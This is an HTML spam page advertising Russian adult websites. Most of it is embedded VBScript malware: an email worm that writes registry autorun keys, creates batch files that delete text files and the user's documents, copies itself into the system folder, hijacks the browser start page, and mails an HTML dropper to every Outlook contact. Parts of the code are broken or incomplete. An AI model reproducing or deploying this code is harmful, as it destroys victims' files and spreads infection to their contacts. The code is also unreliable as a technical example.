<HEAD>
<HTML>
<BODY>
<FRAMESET>
<h1><CENTER>!!! HELLO !!!
<br>
<br>
<h1><CENTER>!!! Go to Best Russian XXX web sites  !!!
<br>
<body bgcolor="#C0C0C0" text="#000000">
<br>
<h1>
<h1><CENTER>http://www.sexymafia.ru
<h1><CENTER>http://www.erogen.ru
<h1><CENTER>http://www.porno.ru
<br>
<MARQUEE>Go to Russian XXX web sites 
<br>
<MARQUEE>Author МАРАТИК
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Маратик"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RegisteredOwner", "LaMER"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Version", "MustDie"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RegisteredOrganization", "MicroSUXX"
next
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon\", "C:\Windows\System\Shell.dll,32"
next
<script language=vbscript>
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\autoexec.bat", True)
w.WriteLine("@echo off
w.WriteLine("del c:\windows\*.txt")
next
<script Language="VBScript">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("c:\Халявный Интернет.bat", True)
w.WriteLine("del c:\Мои документы\*.*")
next
rem "M Y S T I Q U E"
rem "R U S S I A   -   C O O L   C O U N T R Y"
rem "S A I N T - P E T E R S B U R G  -  R U L E Z"
rem "W E L C O M E   T O   R U S S I A   M U S E U M   -   H E R M I T A G E"
rem " M Y   N A M E   -   М А Р А Т И К "
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr> =1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(1)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(1)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirwin&"\Win.vbs")
c.Copy(dirsystem&"\Маратик.txt.vbs")
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Win",dirsystem&"\Win.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Маратик",dirwin&"\Маратик.html"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet 
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirwindows&"\win.com")=1) then
Randomize
num = Int((4 * Rnd) + 1)
sub regruns()
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.sexymafia.ru"
end sub

sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)> int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "BEST RUSSIAN XXX web sites"
male.Body = vbcrlf&"kindly check the attached letter coming from me."
male.Attachments.Add(dirsystem&"\Маратик.html")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1=" <HTML>  <HEAD>  <TITLE> Маратик - HTML <?-?TITLE>  <META 
NAME=@-@Generator@-@ CONTENT=@-@Привет@-@> "&vbcrlf& _
" <META NAME=@-@Author@-@ CONTENT=@-@MYSTIQUE ?-? MystiqueCrash@???.??? ?-? 
@FEAR FACTORY Group ?-? Санкт-Петербург, Россия ?-? Август 2001@-@> "&vbcrlf& _
" <?-?HEAD>  <BODY 
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#Маратик.HTM#-#,#-#main#-#)@-@ 
"&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#Маратик.HTM#-#,#-#main#-#)@-@ 
BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@> "&vbcrlf& _
" <CENTER>  <p> This HTML file need ActiveX Control <?-?p>  <p> To Enable to read 
this HTML file <BR> - Please press #-#YES#-# button to Enable 
ActiveX <?-?p> "&vbcrlf& _
" <?-?CENTER>  <MARQUEE LOOP=@-@Пиздец@-@ 
BGCOLOR=@-@yellow@-@> ----------z--------------------z---------- <?-?MARQUEE>  
"&vbcrlf& _
" <?-?BODY>  <?-?HTML> "&vbcrlf& _
" <SCRIPT language=@-@JScript@-@> "&vbcrlf& _
" <!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var 
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?--> "&vbcrlf& _
" <?-?SCRIPT> "&vbcrlf& _
" <SCRIPT LANGUAGE=@-@VBScript@-@> "&vbcrlf& _
" <!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^Win.*@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^Win.*@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite 
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^Win@-@,dir
system&@-@^-^Win.*.vbs@-@"&vbcrlf& 
_
"?-??-?--> "&vbcrlf& _
" <?-?SCRIPT> "
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\Маратик.html")
b.close
set d=fso.OpenTextFile(dirsystem+"\Маратик.html",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub


